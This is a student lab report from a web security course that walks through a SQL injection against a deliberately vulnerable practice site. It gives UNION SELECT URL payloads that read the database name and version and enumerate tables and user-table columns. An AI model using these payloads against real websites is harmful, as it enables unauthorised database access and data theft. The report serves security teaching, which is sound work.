Wms 2.1

WEB & MOBILE SECURITY LAB
20CSP-338
Submitted for the requirement of
Lab Course
Bachelor Degree of Engineering
COMPUTER SCIENCE & ENGINEERING
Submitted to: Submitted By:

Er. Jayesh Surana Akshat Chauhan
20BCS5931
DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

CHANDIGARH UNIVERSITY, GHARUAN
August-December 2022
LAB INDEX
NAME: Akshat Chauhan UID: 20BCS5931

SUBJECT NAME: WMS Lab SUBJECT CODE: 20CSP-338
Class/Section: 619/A
Sr. Program Date Evaluation Sign

No LW VV FW Total
(12) (8) (10) (30)
1. Identify Http packet on a monitoring tool like 09/08/2022
Wireshark.
2. Design a method to stimulate the html injection and 16/08/2022

cross site scripting to exploit the attackers.
3. Understand How to find CSRF Vulnerability. 28/08/2022
4. Working of the SQL Injection attack. 29/09/2022
ii
Akshat Chauhan
20BCS5931
Experiment-2.1
1. AIM/OVERVIEW OF THE PRACTICAL:
Working of the SQL injection attack.
2. Objective:
SQL Injection attack from command line (URL).
3. TOOLS TO BE USED:
(i) SQLMAP
(ii) Acunetix
(iii) Windows 7
Introduction: SQL Injection (SQLi) is a type of an injection attack that makes it possible
to execute malicious SQL statements. These statements control a database server behind a
web application. Attackers can be use SQL Injection vulnerabilities to bypass application
security measures. They can go around authentication and authorization of a web page or
web application and retrieve the content of the entire SQL database. They can also use SQL
Injection to add, modify, and delete records in the database.
How and why is an SQL Injection Attack Performed

• Attackers can use SQL Injection to find the credentials of other users in the database.
They can then impersonate these users. The impersonated user may be a database
administrator with all database privileges.
• SQL also lets you alter data in database and add new data. For example, in a
financial application, an attacker could use SQL Injection to alter balancer, void
transactions, or transfer money to their account.
• You can use SQL to delete records from a database, even drop tables. Even if the
administrator make database backups, deletion of data could affect application
availability until the database is restored. Also, backups may not cover the most
ii
Akshat Chauhan
20BCS5931
recent data.
• In some database servers, you can access the operating system using the
database server. This may be intentional or accidental. In such case, an
attacker could use an SQL Injection as the initial vector and then attack the
internal network behind a firewall.
4. STEPS FOR EXPERIMENT:
• Open the given below targeted URL in the browser. http://testphp.vulnweb.com/
• Go to http://testphp.vulnweb.com/listproducts.php?cat=1
ii
Akshat Chauhan
20BCS5931
DEPARTMENT OF
EXPERIMENT-1.4
Aim: Working of SQL injection attack.
Requirements: PC with Windows 7 or above.
Steps for the experiment: HTML injection
1. Open the given below targeted URL in the browser. http://testphp.vulnweb.com/
2. Go to http://testphp.vulnweb.com/listproducts.php?cat=1
1
Akshat Chauhan
20BCS5931
DEPARTMENT OF
3. You'll inject the malicious code http://testphp.vulnweb.com/listproducts.php?cat=-1’
4. Put the random number, http://testphp.vulnweb.com/listproducts.php?cat=-1 order by

11 clauses to check the row (tuple).
DEPARTMENT OF
5. Information gathering
● To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10, database()—
Akshat Chauhan
3 20BCS5931
DEPARTMENT OF
● To check the database version, Go to

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10, version()—
6. Information to be fetch ● Table name:

http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,
4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables
%20where%20table_schema=database()--
DEPARTMENT OF
● Column name:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,
4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.col
umns%20where%20table_name= 0x7573657273
Output:
In the above screenshots you can see we have got an error message which means the running
site is infected by SQL injection. Maybe we can get some important data from the users' table,
so let’s penetrate more inside. Again Use the Concat function for table users for retrieving its
entire column names. We successfully retrieve all eight column names from inside the table
users.
Learning outcomes (What I have learnt):
1. Detect SQL Injection

2. SQL Injection Techniques
3. Launch a SQL Injection Attack from the command line (URL).
DEPARTMENT OF
Evaluation Grid (To be created per the SOP and Assessment guidelines):
Sr. No. Parameters Marks Obtained Maximum Marks

1.
2.
3.

Wms 2.1

Uploaded by

Wms 2.1

Uploaded by

WEB & MOBILE SECURITY LAB

Bachelor Degree of Engineering

COMPUTER SCIENCE & ENGINEERING

Submitted to: Submitted By:

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

NAME: Akshat Chauhan UID: 20BCS5931

Sr. Program Date Evaluation Sign

2. Design a method to stimulate the html injection and 16/08/2022

3. Understand How to find CSRF Vulnerability. 28/08/2022

4. Working of the SQL Injection attack. 29/09/2022

1. AIM/OVERVIEW OF THE PRACTICAL:

Working of the SQL injection attack.

SQL Injection attack from command line (URL).

How and why is an SQL Injection Attack Performed

4. STEPS FOR EXPERIMENT:

• Open the given below targeted URL in the browser. http://testphp.vulnweb.com/

Aim: Working of SQL injection attack.

Requirements: PC with Windows 7 or above.

Steps for the experiment: HTML injection

1. Open the given below targeted URL in the browser. http://testphp.vulnweb.com/

3. You'll inject the malicious code http://testphp.vulnweb.com/listproducts.php?cat=-1’

4. Put the random number, http://testphp.vulnweb.com/listproducts.php?cat=-1 order by

● To check the database version, Go to

6. Information to be fetch ● Table name:

Learning outcomes (What I have learnt):

1. Detect SQL Injection

Sr. No. Parameters Marks Obtained Maximum Marks

You might also like